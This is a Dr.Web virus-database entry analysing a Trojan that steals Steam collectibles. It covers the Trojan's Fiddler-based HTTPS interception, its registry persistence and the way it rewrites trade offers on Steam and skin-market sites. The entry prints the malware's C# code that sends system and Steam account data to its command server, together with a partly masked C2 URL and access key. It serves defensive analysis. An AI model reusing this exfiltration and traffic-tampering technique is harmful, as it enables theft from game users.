Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Trojan.PWS.Steam.15278

Added to the Dr.Web virus database: 2017-12-19

Virus description added:

SHA1

  • 2891c6502586de470cad2108c4367ef23b375ff7
  • 3de7719afc981ee96b97300a4cd18b9365c771bf

A Trojan designed to steal collectibles from Steam users. It uses Fiddler to intercept server responses and replace the data in them. Fiddler is installed as a proxy on the infected computer. It will use the port indicated in the Trojan’s configuration (in the examined examples, this is port 8333). Fiddler also installs a root certificate in the system; this allows it to intercept encrypted HTTPS traffic.

Using the Windows system registry, it determines the path to the Steam directory, the operating system’s language settings, and the username from the AutoLoginUser field. In the Steam folder, the Trojan checks whether the file \config\loginusers.vdf is present: if it is, the malicious program parses it and extracts pairs resembling “account name<=> steamid64”.

The Trojan sends the collected information to the command and control server (this data is collected in 30-minute intervals):

NameValueCollection nameValueCollection = new NameValueCollection();
nameValueCollection.Add("type", "s");
nameValueCollection.Add("keyAccess", "809af20434864b142664613a8e42ff78");
nameValueCollection.Add("systemOS", value);
nameValueCollection.Add("systemUser", userName);
nameValueCollection.Add("systemMachine", machineName);
nameValueCollection.Add("languageOS", englishName);
nameValueCollection.Add("steamids", value2);
nameValueCollection.Add("steamPath", Class0.string_4);
nameValueCollection.Add("steamLang", Class0.string_6);
nameValueCollection.Add("steamRememberL", Class0.string_5);
nameValueCollection.Add("online", online.ToString());
Class0.POSTWithFakerHeader(Class0.soft2_req, nameValueCollection);

It saves the following files to its own folder:

  • Windows Host.exe—the Trojan’s body;
  • settings.conf—Fiddler’s configuration;
  • FiddlerCore.dll—Fiddler’s library with a valid digital signature;
  • BCMakeCert.dll—a library with an open source code BouncyCastle.Crypto;
  • CertMaker.dll—the ICertificateProvider plugin for FiddlerCore.

It modifies the system registry branch [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] to ensure its own auto start. The Trojan’s resources have one more executable file—Proxy.Resources.Cleaner.exe. It is used to launch and then shut down Fiddler.

It installs its handler for the OnBeforeResponse function of Fiddler’s library, which allows server responses to be changed into network requests. The handler ignores requests if their URL has the following values: “.bmp”, “.jpg”, “.jpeg”, “.js”, “.png”, “.ico”, “.svg”, “.pdf” and “localhost”. If the configuration of the malicious program has a special flag and a user visits one of the following websites: opskins.com, igxe.cn, bitskins.com, g2a.com, csgo.tm, market.csgo.com, market.dota2.net, tf2.tm, the webpage code is integrated with the malicious script downloaded from the command and control server. It replaces the collectibles recipient when exchanges are made on the specified websites.

If the Trojan’s configuration has the corresponding flag and the user of the infected computer visits the website steamcommunity.com, the Trojan sends the following POST request to the command and control server:

https://f****.pro/soft2/base.php?l=bG9ta2F0b3A%3D&k=809af20434864b142664613a8e42ff78&ek=cba2c8e810c06a917f95f6f424fbffa0

The request sends the data {"type": "r", "keyAccess": "809af20434864b142664613a8e42ff78"}, and the HTTP request gets the parameter “faker”: “gl”. In the received response, the symbols '\xD1\x96’ are replaced with 'i', ‘\xD1\x81’—with ‘c’, and '(' with ‘=’, after which the response is decoded using base64. The decrypted data represents the Trojan’s configuration, which contains the steamid of the user whose inventory is to be replaced, and also the parameters of the collectibles to be used for the replacement.

If the content type in an HTPP request is indicated as HTML, the URL contains the values “steamcommunity.com”, “/tradeoffer”, and the connection uses the HTTP protocol, the Trojan replaces the server’s response with error code 302 and switches the connection to the HTTPS protocol.

If the content type in the HTTP request is indicated as JSON, and the URL contains the values “steamcommunity.com/profiles/7656”, “/inventory/json/” or “steamcommunity.com/tradeoffer”, “partnerinventory” , “partner=”, “appid=”, extracts steamid of the partner and checks whether any steamid parameters are in the data received from the server. If not, it doesn’t do anything.

Then the Trojan extracts the steamid64 value of the exchange partner from the URL and checks whether the data obtained from the command and control server contains the parameters for steamid64. It reads the “Cookie” parameter of the HTTP header and checks the installed language in the parameter “Steam_Language”. If Russian is indicated as the “Steam_Language”, the Trojan will display messages in Russian; in all other cases—in English.

If the values jobject2["rgDescriptions"][jproperty.Name]["market_hash_name”] of the collectibles coincide with those indicated in the key for the server data sent for this steamid, the fields “market_hash_name”, “market_name”, “name”, “name_color”, “icon_url”, “icon_url_large”, “description”->“value” are replaced in rgDescription. They are replaced with data received from the command and control server. The field “classid” is not replaced.

If the content type in the HTTP request is indicated as JSON and the URL contains the values “steamcommunity.com/inventory/”, the Trojan extracts the steamid64 value from the URL and checks whether the data obtained from the command and control server contains the parameters for steamid64. It reads the “Cookie” parameter of the HTTP header and verifies what language is installed in the parameter “Steam_Language”. If Russian is indicated as the “Steam_Language”, the Trojan will display messages in Russian; in all other cases—in English. Then for the collectibles whose values jobject2["rgDescriptions"][jproperty.Name]["market_hash_name”] coincide with those indicated in the “name” field in the steamid data received from the command and control server, the fields are replaced with the values received from the command and control server.

If the content type in the HTTP request is indicated as HTML and the URL contains the values “steamcommunity.com/economy/itemclasshover/” and “content_only=1”, the Trojan parses the page and determines the steamid. Then it attempts to replace the characteristics of the collectibles according to the data it obtained from the command and control server.

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android